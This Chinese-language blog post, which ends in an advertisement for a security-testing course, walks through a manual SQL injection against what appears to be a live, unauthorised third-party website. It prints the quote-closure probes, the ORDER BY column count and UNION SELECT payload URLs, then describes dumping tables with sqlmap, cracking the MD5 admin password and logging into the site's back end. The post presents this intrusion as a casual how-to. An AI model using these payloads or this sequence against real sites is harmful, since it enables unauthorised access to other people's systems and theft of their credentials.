从找漏洞到登录网站后台,一次简单的手动注入漏洞挖掘实战

图片**

起因:

前几天在对某一个站点进行信息搜集的时候,在 C 段(同网段如 192.168.1-255 中所有 ip)的信息里面发现了某一个站点,当时看见了:

url:http://www.xxx..com/class.php?id=104

忍不住加了一个单引号来测试是否存在注入漏洞。

图片

加了单引号之后没有返回信息,果不其然,存在注入漏洞

图片

图片

既然来都来了,那就来一波手动 fuzz,通过手动的方式获取敏感信息吧,正好可以和大家分享一下如何手动注入。

正常的报错注入流程一般都是:

先判断注入点、注入点闭合**、**列数判断、得到库信息、表信息、字段信息,最后再对字段信息进行解密可以得到管理员的账号和密码。

**
**

图片

**
**

测试注入点

  1. 首先是测试注入点在哪,这个是正常界面下返回的信息,一切正常

http://www.xxx..com/class.php?id=104

图片

  1. 常见的闭合方法测试

http://www.xxx..com/class.php?id=104’--+

http://www.xxx..com/class.php?id=104” --+

http://www.xxx..com/class.php?id=104’) --+

这些经过测试发现均返回错误页面,也就证明闭合失败,无法成功闭合

图片

如果不想那么复杂的话,是不是好点?直接用 order by 语句判断列数

**
**

过程如下:

最后通过简单的二分法测试得到当 order by 22 --+ 的时候返回是正常的,因此存在 22 列。

图片

既然知道了存在 22 列,使用 hackbar 中的联合注入工具来判断报错注入可回显注入的点。

http://www.xxx.com/list.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 --+

图片

判断出了 16 的位置是可以回显报错数据的,因此可以使用 16 这个位置来获取所需要的数据。

图片

首先获取当前的数据库信息,获取到当前使用数据库名 xxxw_cn

http://www.xxx.com/list.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,

15,database(),17,18,19,20,21,22 --+

图片

接下来使用同样的手段去获得表和字段信息,在这里不再进行赘述。

sqlmap 一把梭

不是所有的注入都是适合手动去做的,这里还是用 sqlmap 吧,一把梭。。。

首先是 payload

图片

获取库中的表信息

图片

获取库中的表信息

图片

获取表中的字段信息,获取字段信息之后将 password 在 md5 解密平台进行解密,常见的 md5 解密平台有

图片

后台的查找上,直接在域名后面加 admin 是无法跳转到后台的。

图片 图片

这里有一个小技巧,直接使用搜索引擎去搜索,针不戳,直接就找到了

图片

直接使用用户的数据登录后台

图片

由此可见网站安全的重要性,因为安全测试的不可或缺,相关岗位人才缺口达 100 多万

**
**

**掌握安全测试到底有什么用?**这就意味着你简历投出去就会被各种大厂抢着要!

经过 6 个月的调研与筹备,由柠檬班金牌讲师历时 6 年沉淀,专为 1~5 年测试经验的同学量身打造的安全测试首期课程,现在正式进入报名倒计时最后 3 天

我们的 Cat 老师来自于技术一线岗位,深耕技术多年,负责过多次网络安全项目,有红队和蓝队两方面经验,参与过多次公安部组织的国家级攻防演练,在国内网络安全圈子内颇负盛名。

图片

由于 Cat 老师目前都在负责重要安全项目,出于保密协议,老师的照片我们不会公布!

关于安全测试课程内容,扫码添加我们的罗罗老师了解更多课程详情吧~

图片

回帖
请输入回帖内容 ...